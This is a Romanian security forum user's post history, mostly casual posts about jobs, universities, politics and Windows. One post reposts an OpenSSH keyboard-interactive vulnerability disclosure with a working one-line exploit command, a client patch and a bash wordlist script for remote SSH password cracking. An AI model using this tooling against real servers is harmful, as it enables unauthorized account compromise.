-
Posts
1838 -
Joined
-
Last visited
-
Days Won
31
Everything posted by M2G
-
Am o cana cu vin de afine langa mine. Sunt prea zen sa dau ban. Noi daca suntem programatori, reparam bugu. Tu daca esti sysadmin, ai scos componenta defecta. Ce nu e ok?
-
Predau curs/meditatii de fizica cuantica din interiorul procesoarelor
M2G replied to diesel.'s topic in RST Market
Sper sa nu faci asta doar pe RST. Aici s-au incercat sa se faca cursuri gratuite de programare si dupa maxim 2 saptamani sa cam ales praful pentru ca lumea nu mai era interesata. Daca ceea ce predai e si pe bani, nu ma astept sa ai succes in comunitatea aceasta. -
I know. De asta am pus exemplu de link cu RST.
-
Daca introduci adresa in address bar si incerci sa vizitezi "site-ul" atunci crapa aplicatia cu totul.
-
Click here to crash Sursa
-
Link direct catre document [GitHub] Mi sa parut interesant si util. Sunt si exemple si descrieri pentru fiecare. Descriere: The C++ Core Guidelines are a collaborative effort led by Bjarne Stroustrup, much like the C++ language itself. They are the result of many person-years of discussion and design across a number of organizations. Their design encourages general applicability and broad adoption but they can be freely copied and modified to meet your organization's needs. The aim of the guidelines is to help people to use modern C++ effectively. By "modern C++" we mean C++11 and C++14 (and soon C++17). In other words, what would you like your code to look like in 5 years' time, given that you can start now? In 10 years' time? The guidelines are focused on relatively higher-level issues, such as interfaces, resource management, memory management, and concurrency. Such rules affect application architecture and library design. Following the rules will lead to code that is statically type safe, has no resource leaks, and catches many more programming logic errors than is common in code today. And it will run fast - you can afford to do things right. We are less concerned with low-level issues, such as naming conventions and indentation style. However, no topic that can help a programmer is out of bounds. Our initial set of rules emphasize safety (of various forms) and simplicity. They may very well be too strict. We expect to have to introduce more exceptions to better accommodate real-world needs. We also need more rules. You will find some of the rules contrary to your expectations or even contrary to your experience. If we haven't suggested you change your coding style in any way, we have failed! Please try to verify or disprove rules! In particular, we'd really like to have some of our rules backed up with measurements or better examples. You will find some of the rules obvious or even trivial. Please remember that one purpose of a guideline is to help someone who is less experienced or coming from a different background or language to get up to speed. The rules are designed to be supported by an analysis tool. Violations of rules will be flagged with references (or links) to the relevant rule. We do not expect you to memorize all the rules before trying to write code. The rules are meant for gradual introduction into a code base. We plan to build tools for that and hope others will too. Comments and suggestions for improvements are most welcome. We plan to modify and extend this document as our understanding improves and the language and the set of available libraries improve.
-
Cred ca se referea la AWARENESS DAY unde e gratuit si e doar in data de 23.
-
E de apreciat ca omul a fost nationalist si ca a incercat sa faca ceva bun (in opinia lui) pentru tara. Cu toate astea, omul a vrut sa fie presedinte si a participat la alegeri de fiecare data cand a avut ocazia. Cred ca una dintre cele mai proaste situatii pentru Romania ar fi fost sa iasa Vadim presedinte. Chiar daca a fost un om cult, asta nu-l face un bun presedinte sau un model demn de urmat. Se vedeau mult prea clar tentele comuniste in modul in care vorbea si in modul in care ar fi vrut sa conduca prin putere absoluta. In plus, un presedinte se ocupa de politica externa si una dintre cele mai importante abilitati pe care acesta ar trebui sa le aiba este diplomatia. Vadim a suferit grav la capitolul acesta. Nu poti sa pretinzi la presedintie cand atunci cand lucrurile nu merg cum vrei tu, incepi sa zbieri si sa faci spume ca la spitalul 9. Poti sa citesti 100 de carti pe an si sa te dai mare intelectual dar daca atunci cand conteaza cel mai mult iti pierzi firea, e degeaba. Apropo, exercitiu de imaginatie, cum poate un om considerat atat de cult si inteligent sa aiba un asemenea comportament mai ales cand este persoana publica? Nu e cam incongruent cu valorile pe care le reprezinta? Ce imagine ar fi adus Romaniei daca asta era ceea ce proiecta in relatiile diplomatice? Ar fi fost un dezastru. Probabil motivul pentru care a ramas oarecum relevant, desii cam in umbra in ultimii ani, a fost pentru ca poporul era needucat si asa de satul de comunism si coruptie ca Vadim ar fi parut o idee buna si oarecum disperata pentru a aduce situatia politia intr-o pozitie stabila. Cand aceleasi 2 puteri se succedeau la conducere, Vadim a fost o alternativa diferita si asta la facut popular. In plus iesirile lui publice(in decor mai degraba) au alimentat ura poporului fata de clasa politica care a condus atatia ani iar Vadim parea in ochii poporului, omul din conducere cu cel mai apropiat caracter fata de ei pentru ca atat el cat si populatia aveau mai mult sau mai putin aceleasi frustrari.
-
Problema este ca anunturile de genul asta sunt foarte similare si pe mine ca potential angajat nu ma atrage. Tot ce e rosu e implicit pentru orice job care vizeaza tehnologiile amintite de tine. De asta pentru mine ca si posibil aplicant m-ar interesa compania si eventual o scurta descriere a proiectelor. Daca o sa te uiti la descrierea joburilor pe diverse site-uri, pentru .NET au cam aceleasi cerinte si nu iasa in evidenta. Nu vreau sa par critic, doar sa evidentiez ca din punctul meu de vedere ar fi mai bine sa fie postata si compania pentru ca sunt considerate mai multe lucruri decat cerintele atunci cand cauti un job(cultura firmei, specificul proiectelor, locatia, pachetele de beneficii - sa fim seriosi, toti scriu "pachet de beneficii competitiv").
-
Poate ar fi util sa postezi si numele companiei pentru care sunt disponibile aceste joburi.
-
Daca nu iti place matematica si hardware-ul nu merita sa mergi la calculatoare. Cel mai important e sa mergi acolo unde o sa faci mai mult din ce iti place. De exemplu poti sa faci cum a zis @tjt ,mergi intr-un oras mare cum e Cluj/Timisoara,Bucuresti,Iasi si asta nu doar din cauza facultatii sau ca in alte parti nu ar fi mai pregatiti profii ci pentru ca in orasele astea ai oportunitati. Cate companii de software exista in Oradea si cate in unul din orasele enumerate mai nainte? Pot sa-ti zic din perspectiva Clujului ca in fiecare saptamana sunt meetinguri in care angajatii la companii de programare si entuziastii se aduna, discuta si prezinta chestii tehnice de unde ai ce invata. Comunitatea in care o sa traiesti o sa te ajute enorm sa gasesti un job si sa te tina motivat. Indiferent de ce decizie iei, sa nu te gandesti ca mergi la facultate si au acolo o bagheta magica care te face bun in dezvoltare software sau ca daca iti iei toate examenele cu o nota decenta o sa stii sa faci dezvoltare software. Cel mai important e sa fii pasionat si sa faci proiecte care ti se par interesante ca sa acumulezi experienta. Al doilea lucru important (chiar foarte important) e sa mergi sa cunosti cat mai multi oameni pentru ca asta te ajuta mai mult chiar decat skillurile tehnice. Cunostiintele tehnice se invata dar daca ai o retea de oameni in spate o sa iti fie totul mult mai usor. Or sa te motiveze, or sa-ti ofere oportunitati de joburi, or sa iti imparta din experienta lor ca sa iei decizii mai bune pentru viitorul tau. Parerea mea este sa alegi o universitate din unul dintre orasele mari, chiar una care este vazuta mai usoara. De acolo trebuie tu personal sa te dezvolti. Ai pe net atatea resurse incat nu o sa iti ajunga o viata sa inveti, trebuie doar sa vrei. Vezi coursera, udemy, udacity, open2study, edx, pluralsight si lynda (de pe torrente).
-
Ai mai postat odata asta si a fost trimis la cos. Alegerea mea e sa iti dau ban o saptamana.
-
RogentOS e numele grupului care dezvolta argentos si kogaion. Nu e un sistem de operare in sine. noobule
-
Primele zile dupa ce ai instalat chiar si Win7, daca ai un HDD mare si cu multe date pe el o sa dureze probabil cateva zile pana cand sistemul de operare le indexeaza. Face asta pentru a putea sa ofere mai rapid rezultate cand cauti ceva. Click dreapta pe drive(partitie)->properties si vezi ca ai acolo bifat "Allow files on this drive to have contents indexed in addition to file properties". Eu am pus aseara W10 pe un SSD nou. Disk usage e 0% in idle.
-
Programatorii, scutiti de la plata impozitului pe venit.
M2G replied to QuoVadis's topic in Stiri securitate
Mai mult de atat, un programator, in conceptia lor, e ala care a avut rabdare sa termine "O FACULTATE". Din ultima forma a legii, nu se mai specifica care sunt facultatile de la care daca ai diploma, esti scutit de impozit. Practic, trebuie sa ai orice facultate terminata. Poti sa termini la facultatea de sport cu media 6 si esti scutit de impozit daca lucrezi in IT. Altul care nu are o facultate absolvita dar poate are experienta de 5 ani in dezvoltarea de software sau certificari internationale, o sa plateasca impozit. "Tare", nu? -
Se poate descarca ca si ISO si folosi licenta (KEY) de la Windows 7/8 pentru a face un fresh install? Sau vine exclusiv prin update? As vrea sa fac un clean install.
-
Nu meriti nimic! Tigan... E ca si cum cineva iti face un costum la comanda, il folosesti la o nunta dupa care zici magazinului ca nu-l mai platesti ca oricum nu mai ai de mers la nici o nunta.
-
Nu ne pasa! (de chat zic, evident)
-
Epic! ) Avertisment urgent despre Windows 10! Leg?tura ocult? dintre asistentul personal Cortana, acceleratorul de particule de la Geneva ?i computerul cuantic! Windows 10 vrea s? ne controleze total! | Secretele lui Lovendal - Secrete, conspiratii, OZN,
-
Linux (x86) Exploit Development Series
M2G replied to neox's topic in Reverse engineering & exploit development
@NO-MERCY Can you make some mirrors? I don't want to create a 4shared account or link any of my social media accounts. Thanks! -
OpenSSH has a default value of six authentication tries before it will close the connection (the ssh client allows only three password entries per default). With this vulnerability an attacker is able to request as many password prompts limited by the “login graced time” setting, that is set to two minutes by default. Especially FreeBSD systems are affected by the vulnerability because they have keyboard-interactive authentication enabled by default. A simple way to exploit the bug is to execute this command: ssh -lusername -oKbdInteractiveDevices=`perl -e 'print "pam," x 10000'` targethost This will effectively allow up to 10000 password entries limited by the login grace time setting. The crucial part is that if the attacker requests 10000 keyboard-interactive devices openssh will gracefully execute the request and will be inside a loop to accept passwords until the specified devices are exceeded. Here is a patch for openssh-6.9p1 that will allow to use a wordlist and any passwords piped to the ssh process to be used in order to crack passwords remotely. ---snip--- diff openssh-6.9p1/sshconnect2.c openssh-6.9p1-modified/sshconnect2.c 83a84,85 > char password[1024]; > 510c512,517 < authctxt->success = 1; /* break out */ --- > printf("==============================================\n"); > printf("*** SUCCESS **********************************\n"); > printf("*** PASSWORD: %s\n", password); > printf("==============================================\n"); > exit(0); > 1376a1384,1385 > char *devicebuffer; > int i; 1386a1396,1405 > devicebuffer = calloc(1, 200000); > if (!devicebuffer) { > fatal("cannot allocate devicebuffer"); > } > > for (i=0;i<200000-2;i+=2) { > memcpy(devicebuffer + i, "p,", 2); > } > devicebuffer[200000] = 0; > 1393,1394c1412 < packet_put_cstring(options.kbd_interactive_devices ? < options.kbd_interactive_devices : ""); --- > packet_put_cstring(devicebuffer); 1408c1426 < char *name, *inst, *lang, *prompt, *response; --- > char *name, *inst, *lang, *prompt; 1410c1428 < int echo = 0; --- > char *pos; 1425a1444 > 1430a1450 > 1443,1449c1463,1469 < echo = packet_get_char(); < < response = read_passphrase(prompt, echo ? RP_ECHO : 0); < < packet_put_cstring(response); < explicit_bzero(response, strlen(response)); < free(response); --- > packet_get_char(); > if (fgets(password, 1024, stdin) == NULL) > exit(0); > if ((pos=strchr(password, '\n')) != NULL) > *pos = ''; > printf("%s\n", password); > packet_put_cstring(password); ---snip--- After applying the patch you can use this shell script to make the password attack from a wordlist: ---snip--- #!/bin/bash # run as: # cat wordlist.txt | ./sshcracker.sh ssh-username ssh-target # while true do ./ssh -l$1 $2 rc=$?; if [[ $rc == 0 ]]; then exit $rc; fi echo Respawn due to login grace time... done ---snip--- For example enter this command: cat wordlist.txt | ./sshcracker.sh test 192.168.2.173 The attack has been tested against a new FreeBSD 10.1 system and older FreeBSD versions such as version 6.2. Sursa
-
- 1
-
Cred ca sunt cateva intrebari interesante in legatura cu asta. Nu cred ca a fost specificat dar functia de edit and continue merge doar pe cod managed sau si pe unmanaged? As fi curios de asemenea daca ar merge pentru native mobile development. Poate merge doar in emulator, sau merge si pe device?